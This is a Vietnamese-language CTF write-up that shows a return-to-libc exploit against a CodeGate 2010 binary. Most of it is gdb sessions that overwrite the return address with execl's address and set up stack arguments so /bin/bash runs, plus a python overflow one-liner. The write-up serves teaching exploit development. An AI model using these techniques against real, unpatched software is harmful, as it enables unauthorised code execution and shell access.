Ret2Libc ( vi du Execl)

Truoc tien tim hieu chuong trinh goi execl se nhu hoat dong ra sao :

#include
#include
/*
*
* Chuong trinh nay de xac dinh cach dua thong so vao ham execl
* Ngay truoc khi call execl, stack se chia dia chi cua chuoi "/bin/sh"
*/
int main()
{
execl("/bin/sh","sh",NULL);
}

(gdb) b main
Breakpoint 1 at 0x80483f2
(gdb) r
Starting program: /home/suto/Learning/Expoit Writer/BufferOverFlow/Ret2libc/CallExecl

Breakpoint 1, 0x080483f2 in main ()
(gdb) p execl
$1 = {} 0xb7f1d330
(gdb)

Sau nay chuong trinh cua chung ta se return zo 0xb7f1d330 do vay chung ta se break tai day de xem xet stack tai thoi diem do ra sao, muc dich de chung ta bo tri stack ( thong qua buffer ) cua chung ta cho hop li de chuong trinh chay shell.

(gdb) b *0xb7f1d330
Breakpoint 2 at 0xb7f1d330
(gdb) c
Continuing.

Breakpoint 2, 0xb7f1d330 in execl () from /lib/libc.so.6
(gdb) x/4x $esp
0xbfffefdc: 0x08048411 0x080484e3 0x080484e0 0x00000000
(gdb) x/s 0x080484e3
0x80484e3: "/bin/sh"
(gdb) x/s 0x080484e0
0x80484e0: "sh"
(gdb)

0x08048411 -> 0x08048411 (main + 4)
Con 2 gia tri kia thi chac ro roi :D

Gio nhay vao ung dung thuc te Ret2Execl .

Starting program: /mnt/d/PreCtf/CodeGate/Exploit/harder_2010
Input: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2ABBBBBBBBBBBB

Breakpoint 2, 0x08048501 in func ()
(gdb) c
Continuing.

Breakpoint 1, 0x08048509 in func ()
(gdb) x/4x $ebp
0xbffff008: 0x41386941 0x6a413969 0x316a4130 0x41326a41
(gdb) set *0xbffff00c=0xb7f1d330
(gdb) x/4x $ebp
0xbffff008: 0x41386941 0xb7f1d330 0x316a4130 0x41326a41
(gdb) x/4i $eip
0x8048509 : leave
0x804850a : ret
0x804850b

: push %ebp
0x804850c : mov %esp,%ebp
(gdb) stepi
0x0804850a in func ()
(gdb)
0xb7f1d330 in execl () from /lib/libc.so.6
(gdb) x/4x $esp
0xbffff010: 0x316a4130 0x41326a41 0x42424242 0x42424242
(gdb)

O day chung ta thay rang luc nay cac gia tri tren stack deu do chung ta dieu khien ( tu chuoi buffer ma ra ) do vay co the dung gdb de thay doi cac gia tri do cho no giong nhu la goi execl("/bin/sh","sh",0)

Ta co o day :
0xbffff3c0: "SHELL=/bin/bash"

(gdb) x/s 0xbffff3c6
0xbffff3c6: "/bin/bash"
(gdb) x/s 0xbffff3cd
0xbffff3cd: "sh"

(gdb) set *0xbffff018=0xbffff3cd
(gdb) x/4x $esp
0xbffff010: 0x316a4130 0xbffff3c6 0xbffff3cd 0x42424242
(gdb) set *0xbffff010=0x08048568
(gdb) set *0xbffff020=0
(gdb) x/4x $esp
0xbffff010: 0x08048568 0xbffff3c6 0xbffff3cd 0x42424242
(gdb) set *0xbffff01c=0
(gdb) x/4x $esp
0xbffff010: 0x08048568 0xbffff3c6 0xbffff3cd 0x00000000
(gdb) c
Continuing.
Executing new program: /bin/bash


Nhu vay chung ta hoan toan dieu khien dc qua trinh nay :)
Co the thuc thi chuong trinh nhu sau :

python -c "print 'a'*288+'\x00\x00\x00\x00'"|./harder_2010


Minh them \x00 vi neu nhu khong co no se tu dong them ki tu xuong dong vao cuoi chuoi trong khi chung ta can o cuoi la NULL,

Program terminated with signal 11, Segmentation fault.
#0 0x61616161 in ?? ()
gdb$ x/20x $esp
0xbffff520: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffff530: 0x00000000 0xb7fc000a 0x00000126 0x0804b008